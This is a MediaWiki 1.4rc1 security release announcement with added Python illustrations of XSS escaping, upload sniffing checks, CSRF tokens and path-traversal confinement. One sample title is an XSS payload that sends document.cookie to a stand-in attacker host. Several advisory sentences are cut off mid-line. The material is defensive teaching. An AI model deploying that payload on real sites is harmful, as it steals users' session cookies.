-----BEGIN PGP SIGNED MESSAGE-----
MediaWiki 1.4rc1 is a security and bug fix release for the 1.4 beta
== Important security updates ==
A security audit found and fixed a number of problems. Users of MediaWiki
1.3.10 and earlier should upgrade to 1.3.11; users of 1.4 beta releases
should upgrade to 1.4rc1.
=== Cross-site scripting vulnerability ===
XSS injection points can be used to hijack session and authentication
cookies, and serve as a foothold for more serious attacks.
* Media: links output raw text into an attribute value, potentially
* Additional checks added to file upload to protect against MSIE and
  Safari MIME-type autodetection bugs.
* User-customized CSS and JavaScript are disabled by default as a general
  precaution. Sites which want this ability may set $wgAllowUserCss and
  $wgAllowUserJs in LocalSettings.php.
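The two XSS items above share one root cause: attacker-controlled bytes reaching a context where the browser interprets them. The following is an added Python illustration, not MediaWiki's PHP code, of both halves: a Media: link rendered with the title dropped raw into an attribute beside the escaped form, and an upload check of the kind the advisory describes, which refuses a file whose extension does not match its magic number or whose leading bytes look like HTML (the MIME-autodetection case). The sample titles, the magic-number table, the tag list and the byte window are constructed for this example.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed sample titles (not from the advisory): one harmless, one that
# tries to close the href attribute and add an event handler.
SAMPLE_TITLES = [
    "Example.png",
    'x.png" onmouseover="location=\'http://evil.example/?\'+document.cookie',
]


def media_link_unsafe(title):
    """'Before' shape: the title goes into an attribute value unescaped."""
    return '<a href="/images/%s" class="internal">%s</a>' % (title, title)


def media_link_safe(title):
    """Escape for attribute and text context; a quote becomes &quot; and
    can no longer terminate the href value."""
    esc = escape(title, quote=True)
    return '<a href="/images/%s" class="internal">%s</a>' % (esc, esc)


class _FirstAnchor(HTMLParser):
    """Collect the attributes a browser would see on the first <a> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "a" and self.attrs is None:
            self.attrs = dict(attrs)


def anchor_attributes(markup):
    parser = _FirstAnchor()
    parser.feed(markup)
    return parser.attrs or {}


# Upload side: MSIE and Safari of the era ignored the served Content-Type
# when the first bytes looked like HTML, so an "image" carrying markup in
# its header would run as a page on the wiki's origin. Assumed checks: the
# extension must have a known magic number, the bytes must match it, and
# the head of the file must not contain HTML tags.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8", "jpg": b"\xff\xd8\xff"}
HTML_TAGS = re.compile(
    rb"<(?:!doctype|html|head|body|script|title|meta|link|style|iframe|"
    rb"plaintext|table|div|img|a\s)",
    re.I,
)


def looks_like_html(data, window=1024):
    return HTML_TAGS.search(data[:window]) is not None


def upload_allowed(filename, data):
    """Return (allowed, reason) for an uploaded file body."""
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext not in MAGIC:
        return False, "extension not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    if looks_like_html(data):
        return False, "HTML-like content in file header"
    return True, "ok"
```

Parsing the rendered markup back with the standard HTML parser is the honest check: it shows which attributes a browser would actually see on the tag, rather than relying on eyeballing the string.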
=== Cross-site request forgery ===
Cross-site request forgery allows an attacker to perform restricted
actions by tricking an authenticated user into visiting a malicious web
page. A fix for page editing in 1.3.10/1.4beta6 has been expanded in
this release to other forms and functions.
Authors of bot tools may need to update their code to include the
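The mechanism behind the "cross-site form submission protection" is a token that only the legitimate form can carry. This is an added Python sketch of that idea, not MediaWiki's implementation: the token is an HMAC bound to the session, it is embedded in the form the server renders, and a POST is accepted only when the token in the body matches the session named by the cookie. The session store, the server secret, and the form field name `token` are assumptions for this example; the request bodies are constructed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Assumed server-side state (constructed for this example): a per-process
# secret and an in-memory session table keyed by the session cookie value.
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {}  # session_id -> {"user": str, "salt": bytes}


def start_session(user):
    """Log a user in and return the value that goes into the session cookie."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "salt": secrets.token_bytes(16)}
    return sid


def edit_token(sid):
    """Per-session token: HMAC over the session id and a per-session salt.
    It is embedded in the edit form the server renders for this user; a
    page on another origin cannot read it."""
    session = SESSIONS[sid]
    msg = sid.encode() + session["salt"]
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def handle_edit(cookie_sid, form_body):
    """Process a POSTed edit. The browser sends the cookie automatically on
    a cross-site POST, so the cookie alone proves nothing; the hidden
    'token' field (hypothetical name) must also match this session."""
    if cookie_sid not in SESSIONS:
        return 403, "not logged in"
    fields = parse_qs(form_body, keep_blank_values=True)
    submitted = fields.get("token", [""])[0]
    expected = edit_token(cookie_sid)
    # Constant-time comparison; encode so non-ASCII input cannot raise.
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return 403, "session token mismatch, edit not saved"
    return 200, "edit saved by %s" % SESSIONS[cookie_sid]["user"]


def demo():
    """Status codes for a legitimate edit, a forged cross-site POST with no
    token, and a forged POST with a guessed token."""
    sid = start_session("Alice")
    legit = "text=hello&token=" + edit_token(sid)
    forged_blank = "text=vandalism"
    forged_guess = "text=vandalism&token=" + "0" * 64
    return (
        handle_edit(sid, legit)[0],
        handle_edit(sid, forged_blank)[0],
        handle_edit(sid, forged_guess)[0],
    )
```

This is also why bot authors have to adapt: a script that only replays the session cookie looks exactly like the forged requests above, so it must first fetch the form and resubmit the token it was given.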
=== Directory traversal ===
An unchecked parameter in image deletion could allow an authenticated
administrator to delete arbitrary files in directories writable by the
web server, and to confirm the existence of files that could not be
deleted.
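Two fixes belong together here: confining the resolved path to the image directory, and answering an out-of-tree request exactly as a missing file would be answered, so the second half of the problem (probing for files that cannot be deleted) is closed as well. The following is an added Python example, not MediaWiki's code; the directory layout, the file names and the `LocalSettings.php` stand-in outside the image tree are constructed for the demonstration.

```python
import os
import tempfile


def resolve_inside(base_dir, user_path):
    """Absolute path for user_path under base_dir, or None if it escapes.
    realpath() collapses '..' and follows symlinks before the prefix test,
    and os.path.join() yields the absolute path unchanged if the caller
    passed one, so both traversal forms land in the same check."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if candidate == base or not candidate.startswith(base + os.sep):
        return None
    return candidate


def delete_image(base_dir, user_path):
    """Delete a file under the image directory and return a status string.
    Out-of-tree requests and nonexistent files get the same answer, so the
    caller learns nothing about files outside the tree."""
    target = resolve_inside(base_dir, user_path)
    if target is None or not os.path.isfile(target):
        return "not found"
    os.remove(target)
    return "deleted"


def demo():
    """Run the four cases against a constructed temp tree: a real image,
    a '..' traversal, an absolute path, and a missing image. Returns the
    status list and whether the out-of-tree file survived."""
    with tempfile.TemporaryDirectory() as tmp:
        images = os.path.join(tmp, "images")
        os.mkdir(images)
        # Constructed sensitive file outside images/, never to be touched.
        secret = os.path.join(tmp, "LocalSettings.php")
        for path in (os.path.join(images, "a.png"), secret):
            open(path, "w").close()
        results = [
            delete_image(images, "a.png"),
            delete_image(images, "../LocalSettings.php"),
            delete_image(images, secret),
            delete_image(images, "nope.png"),
        ]
        survived = os.path.exists(secret)
    return results, survived
```

The prefix test uses `base + os.sep` rather than `base` alone, so a sibling directory such as `images2` does not pass as being inside `images`.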
== Changes since 1.4beta6 ==
* Fix notice error on nonexistent template in wikitext system message
* (bug 1469) add missing <ul> tags on Special:Log
* (bug 1470) remove extra <ul> tags from Danish log messages
* Fix notice on purge w/ squid mode off
* (bug 1477) hide details of SQL error messages by default
  Set $wgShowSQLErrors = true for debugging.
* (bug 1430) Don't check for template data when editing page that
* Recentchanges table purging fixed when using table prefix
* (bug 1431) Avoid redundant objectcache garbage collection
* (bug 1474) Switch to better-cached index for statistics page count
* Run Unicode normalization on all input fields
* Fix translation for allpagesformtext2 in LanguageZh_cn and LanguageZh_tw
* Block image revert without valid login
* (bug 1446) stub Bambara (bm) language file using French messages
* (bug 1432) Update Estonian localization
* (bug 1471) unclosed <p> tag in Danish messages
* convertLinks script fixes
* Corrections to template loop detection
* XHTML encoding fix for usernames containing & in Special:Emailuser
* (for zh) Search for variant links even when conversion is turned off,
  to help prevent duplicate articles.
* Disallow ISO 8859-1 C1 characters and "no-break space" in user names
  on Latin-1 wikis.
* Correct the name of the main page in LanguageIt
* Allow Special:Makesysop to work for usernames containing SQL special
* Fix annoying blue line in Safari on scaled-down images on description page
* Increase upload sanity checks
* Fix XSS bug in Media: links
* Add cross-site form submission protection to various actions
* Fix fatal error on some dubious page titles
* Stub threshold displays correctly again
Low-traffic release announcements mailing list:
Wiki admin help mailing list:
Bug report system:
Play "stump the developers" live on IRC:
#mediawiki on irc.freenode.net
- -- brion vibber (brion @ pobox.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (Darwin)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
-----END PGP SIGNATURE-----